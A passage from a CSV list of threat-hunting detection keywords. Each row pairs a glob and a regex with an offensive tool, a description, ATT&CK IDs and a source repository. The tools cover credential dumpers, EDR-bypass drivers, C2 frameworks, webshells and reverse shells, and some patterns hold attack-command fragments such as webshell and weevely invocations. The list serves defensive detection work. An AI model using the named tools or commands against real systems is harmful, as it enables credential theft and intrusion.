CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*wdigest!g_IsCredGuardEnabled*",".{0,1000}wdigest!g_IsCredGuardEnabled.{0,1000}","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","214","31","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*wdigest/decryptor.py*",".{0,1000}wdigest\/decryptor\.py.{0,1000}","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","1","N/A","N/A","10","2670","357","2024-04-05T20:43:37Z","2018-05-25T22:21:20Z" "*--wdigest-offsets *.csv *",".{0,1000}\-\-wdigest\-offsets\s.{0,1000}\.csv\s.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*WdigestOffsets.csv*",".{0,1000}WdigestOffsets\.csv.{0,1000}","offensive_tool_keyword","EDRSandBlast","EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections","T1547.002 - T1055.001 - T1205","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/wavestone-cdt/EDRSandblast","1","0","N/A","10","10","1361","264","2024-01-28T15:02:08Z","2021-11-02T15:02:42Z" "*We had a woodoo*",".{0,1000}We\shad\sa\swoodoo.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","10","10","332","80","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z" "*We recommend to XOR your shellcode before you transfer it*",".{0,1000}We\srecommend\sto\sXOR\syour\sshellcode\sbefore\syou\stransfer\sit.{0,1000}","offensive_tool_keyword","DNSStager","DNSStager is an open-source project based on Python used to hide and transfer your payload using DNS.","T1071.004 - T1568.002 - T1102","TA0002 - TA0005 - TA0009 - TA0010","N/A","N/A","Defense Evasion","https://github.com/mhaskar/DNSStager","1","0","N/A","10","6","598","132","2023-05-03T12:25:07Z","2021-04-18T21:58:21Z" "*we.exe -s rssocks -d *",".{0,1000}we\.exe\s\-s\srssocks\s\-d\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*weak1337/Alcatraz*",".{0,1000}weak1337\/Alcatraz.{0,1000}","offensive_tool_keyword","Alcatraz","x64 binary obfuscator","T1027 - T1140","TA0004 - TA0042","N/A","N/A","Defense Evasion","https://github.com/weak1337/Alcatraz","1","1","N/A","10","10","1552","235","2023-07-14T14:19:01Z","2022-12-21T17:27:56Z" "*weakpass.com/crack-js*",".{0,1000}weakpass\.com\/crack\-js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass.com/generate*",".{0,1000}weakpass\.com\/generate.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass.com/wordlist/*",".{0,1000}weakpass\.com\/wordlist\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass/crack-js*",".{0,1000}weakpass\/crack\-js.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass_3.7z*",".{0,1000}weakpass_3\.7z.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass_3a.7z.torrent*",".{0,1000}weakpass_3a\.7z\.torrent.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*weakpass-main.*",".{0,1000}weakpass\-main\..{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","4","367","37","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" "*Weaponized JuciyPotato by @decoder_it and @Guitro along with BITS WinRM discovery*",".{0,1000}Weaponized\sJuciyPotato\sby\s\@decoder_it\sand\s\@Guitro\salong\swith\sBITS\sWinRM\sdiscovery.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*web_cloner/interceptor*",".{0,1000}web_cloner\/interceptor.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","N/A","Frameworks","https://github.com/beefproject/beef","1","1","N/A","N/A","10","9387","2058","2024-05-01T20:01:18Z","2011-11-23T06:53:25Z" "*webapi/nemesis_api.py*",".{0,1000}webapi\/nemesis_api\.py.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","1","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*WebBrowserPassView.cfg*",".{0,1000}WebBrowserPassView\.cfg.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*WebBrowserPassView.exe*",".{0,1000}WebBrowserPassView\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*WebBrowserPassView.exe*",".{0,1000}WebBrowserPassView\.exe.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*WebBrowserPassView.pdb*",".{0,1000}WebBrowserPassView\.pdb.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*WebBrowserPassView.zip*",".{0,1000}WebBrowserPassView\.zip.{0,1000}","offensive_tool_keyword","webBrowserPassView","WebBrowserPassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 - 11.0). Mozilla Firefox (All Versions). Google Chrome. Safari. and Opera. This tool can be used to recover your lost/forgotten password of any Website. including popular Web sites. like Facebook. Yahoo. Google. and GMail. as long as the password is stored by your Web Browser.","T1003 - T1021 - T1056 - T1110 - T1212 - T1552","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://www.nirsoft.net/utils/web_browser_password.html","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*webcam-capture-0.3.10.jar*",".{0,1000}webcam\-capture\-0\.3\.10\.jar.{0,1000}","offensive_tool_keyword","saint","(s)AINT is a Spyware Generator for Windows systems written in Java","T1056.001 - T1125 - T1123 - T1113 - T1105 - T1573.001","TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","C2","https://github.com/tiagorlampert/sAINT","1","1","N/A","10","10","679","306","2020-04-03T14:34:34Z","2017-11-18T18:43:25Z" "*webcamsnap -v*",".{0,1000}webcamsnap\s\-v.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*webclientservicescanner -dc-ip *",".{0,1000}webclientservicescanner\s\-dc\-ip\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*WebDavC2*",".{0,1000}WebDavC2.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*webdavC2.py*",".{0,1000}webdavC2\.py.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*WebDavC2-master.zip*",".{0,1000}WebDavC2\-master\.zip.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*webdavC2server.py*",".{0,1000}webdavC2server\.py.{0,1000}","offensive_tool_keyword","WebDavC2","WebDavC2 is a PoC of using the WebDAV protocol with PROPFIND only requests to serve as a C2 communication channel between an agent. running on the target system. and a controller acting as the actuel C2 server.","T1571 - T1210.001 - T1190","TA0003 - TA0007 - TA0011","N/A","N/A","C2","https://github.com/Arno0x/WebDavC2","1","0","N/A","10","10","117","84","2019-08-27T06:51:42Z","2017-09-07T14:00:28Z" "*WebDeveloperSecurityChecklist*",".{0,1000}WebDeveloperSecurityChecklist.{0,1000}","offensive_tool_keyword","WebDeveloperSecurityChecklist","A checklist of important security issues you should consider when creating a web application.can be used by attacker to check wweakness to exploit","T1593 - T1594 - T1595 - T1567","TA0007 - TA0009 - TA0004","N/A","N/A","Information Gathering","https://github.com/virajkulkarni14/WebDeveloperSecurityChecklist","1","0","N/A","N/A","5","408","60","2021-05-10T07:48:47Z","2017-05-16T20:31:38Z" "*web-hacking-toolkit.git*",".{0,1000}web\-hacking\-toolkit\.git.{0,1000}","offensive_tool_keyword","web-hacking-toolkit","A web hacking toolkit Docker image with GUI applications support.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/signedsecurity/web-hacking-toolkit","1","1","N/A","N/A","2","156","30","2023-01-31T10:11:30Z","2021-10-16T15:47:52Z" "*webinject64.dll*",".{0,1000}webinject64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*webshell http*/tomcatwar.jsp?cmd=*",".{0,1000}webshell\shttp.{0,1000}\/tomcatwar\.jsp\?cmd\=.{0,1000}","offensive_tool_keyword","Spring4Shell","CVE-2022-22965 - CVE-2010-1622 redux","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/DDuarte/springshell-rce-poc","1","0","N/A","N/A","1","20","11","2023-04-18T14:15:42Z","2022-03-31T08:06:46Z" "*webshell_execute*",".{0,1000}webshell_execute.{0,1000}","offensive_tool_keyword","Ninja","Open source C2 server created for stealth red team operations","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/ahmedkhlief/Ninja","1","1","N/A","10","10","759","166","2022-09-26T16:07:43Z","2020-03-04T14:17:22Z" "*webshell-exegol.php*",".{0,1000}webshell\-exegol\.php.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*WebSocketReverseShellDotNet*",".{0,1000}WebSocketReverseShellDotNet.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z" "*weevely generate *.php*",".{0,1000}weevely\sgenerate\s.{0,1000}\.php.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*weevely https://*.php * id*",".{0,1000}weevely\shttps\:\/\/.{0,1000}\.php\s.{0,1000}\sid.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Welcome to OpenBullet 2*",".{0,1000}Welcome\sto\sOpenBullet\s2.{0,1000}","offensive_tool_keyword","openbullet","The OpenBullet web testing application.","T1211 - T1211.002 - T1254 - T1254.001 - T1190 - T1190.001","TA0005 - TA0001","N/A","N/A","Web Attacks","https://github.com/openbullet/OpenBullet2","1","0","N/A","10","10","1565","446","2024-01-23T11:49:34Z","2020-04-23T14:04:16Z" "*Welcome to the Mrvar0x PowerShell Remote Shell!*",".{0,1000}Welcome\sto\sthe\sMrvar0x\sPowerShell\sRemote\sShell!.{0,1000}","offensive_tool_keyword","Shell3er","PowerShell Reverse Shell","T1059 - T1204 - T1105 - T1136 - T1021","TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/yehia-mamdouh/Shell3er","1","0","N/A","9","10","59","12","2023-05-07T16:02:41Z","2023-05-07T15:35:16Z" "*wePWNise*",".{0,1000}wePWNise.{0,1000}","offensive_tool_keyword","wePWNise","wePWNise is proof-of-concept Python script which generates VBA code that can be used in Office macros or templates. It was designed with automation and integration in mind. targeting locked down environment scenarios. The tool enumerates Software Restriction Policies (SRPs) and EMET mitigations and dynamically identifies safe binaries to inject payloads into. wePWNise integrates with existing exploitation frameworks (e.g. Metasploit. Cobalt Strike) and it also accepts any custom payload in raw format.","T1203 - T1059 - T1564.001","TA0002 - TA0003 - TA0007","N/A","N/A","POST Exploitation tools","https://github.com/FSecureLABS/wePWNise","1","0","N/A","N/A","4","350","96","2018-08-27T22:00:25Z","2016-11-09T11:01:11Z" "*werdhaihai/AtlasReaper*",".{0,1000}werdhaihai\/AtlasReaper.{0,1000}","offensive_tool_keyword","AtlasReaper","A command-line tool for reconnaissance and targeted write operations on Confluence and Jira instances.","T1210.002 - T1078.003 - T1046 ","TA0001 - TA0007 - TA0040","N/A","N/A","Reconnaissance","https://github.com/werdhaihai/AtlasReaper","1","1","N/A","3","3","232","26","2023-09-14T23:50:33Z","2023-06-24T00:18:41Z" "*werfault_shtinkering*",".{0,1000}werfault_shtinkering.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*werfault_silent_process_exit*",".{0,1000}werfault_silent_process_exit.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*WerTrigger.exe*",".{0,1000}WerTrigger\.exe.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","172","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*WerTrigger-master*",".{0,1000}WerTrigger\-master.{0,1000}","offensive_tool_keyword","WerTrigger","Weaponizing for privileged file writes bugs with windows problem reporting","T1059.003 - T1055.001 - T1127.001 - T1546.008","TA0002 - TA0004 ","N/A","N/A","Privilege Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","9","2","172","34","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z" "*wevtutil qe security /format:text /q:*Event[System[(EventID=4624)]*find *Source Network Address*",".{0,1000}wevtutil\sqe\ssecurity\s\/format\:text\s\/q\:.{0,1000}Event\[System\[\(EventID\=4624\)\].{0,1000}find\s.{0,1000}Source\sNetwork\sAddress.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tools","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*wfencode -*",".{0,1000}wfencode\s\-.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfencode -e *",".{0,1000}wfencode\s\-e\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfencode.bat*",".{0,1000}wfencode\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfencode.py*",".{0,1000}wfencode\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfpayload -*",".{0,1000}wfpayload\s\-.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfpayload.bat*",".{0,1000}wfpayload\.bat.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*wfpayload.py*",".{0,1000}wfpayload\.py.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","1","N/A","9","10","5648","1330","2024-03-23T00:13:22Z","2014-10-22T21:23:49Z" "*WfpEscalation.exe*",".{0,1000}WfpEscalation\.exe.{0,1000}","offensive_tool_keyword","NoFilter","Tool for abusing the Windows Filtering Platform for privilege escalation. It can launch a new console as NT AUTHORITY\SYSTEM or as another user that is logged on to the machine.","T1548 - T1548.002 - T1055 - T1055.004","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/NoFilter","1","1","N/A","9","3","283","44","2023-08-20T07:12:01Z","2023-07-30T09:25:38Z" "*WfpTokenDup.exe -*",".{0,1000}WfpTokenDup\.exe\s\-.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004 - T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu/","1","0","N/A","10","7","673","104","2024-04-23T03:05:39Z","2021-12-28T13:14:25Z" "*wfuzz --*.txt*",".{0,1000}wfuzz\s\-\-.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*wfuzz*",".{0,1000}wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application 